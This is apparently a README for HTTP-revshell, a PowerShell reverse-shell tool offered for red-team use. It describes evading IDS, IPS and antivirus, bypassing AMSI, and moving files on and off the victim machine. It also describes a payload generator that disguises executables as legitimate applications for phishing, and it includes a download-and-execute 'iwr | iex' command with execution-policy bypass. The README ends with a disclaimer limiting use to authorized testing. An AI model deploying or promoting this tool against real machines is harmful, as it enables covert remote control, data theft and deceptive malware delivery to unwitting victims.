Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware

Powershell HTTP/S Reverse Shell

Category-tool Powershell Python License

HTTP-revshell is a tool focused on redteam exercises and pentesters. This tool provides a reverse connection through the http/s protocol. It uses a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.

HTTP-revshell

Help server.py

Server usage:

usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Help Invoke-WebRev.ps1 (client)

Client usage:

Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installation

git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Features

  • SSL
  • Proxy Aware
  • Upload files
  • Download files
  • Load powershell scripts through the server
  • Error Control
  • AMSI bypass
  • Autocomplete PowerShell functions (optional)

Extra functions usage

Upload

This function allow you to upload any file to the victim machine.

Usage:

upload /src/path/file C:\dest\path\file

Download

This function allow you to download a file to the attacker machine.

Usage:

download C:\src\path\file /dst/path/file

Loadps1

This function allows you to load from powershell scripts without having to write to the victim's disk, reading the file through legitimate HTTP traffic.

Usage:

loadps1 /path/to/the/local/server/PowershellScript.ps1

Help Revshell-Generator.ps1 (Automatic Payload Generator)

This script allows you to create an executable file with the payload necessary to use HTTP-revshell, you just need to follow the instructions on the screen to generate it. There are 6 predefined templates and a customizable one, with the data that you like.

The payloads generated by the tool, incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.

Payload Generator usage:

powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

IMPORTANT: All fields in predefined templates are auto-complete by pressing the enter key.

Credits

Disclaimer & License

This script is licensed under LGPLv3+. Direct link to License.

HTTP-revshell should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Please refer to errornoerror.com for more similar questions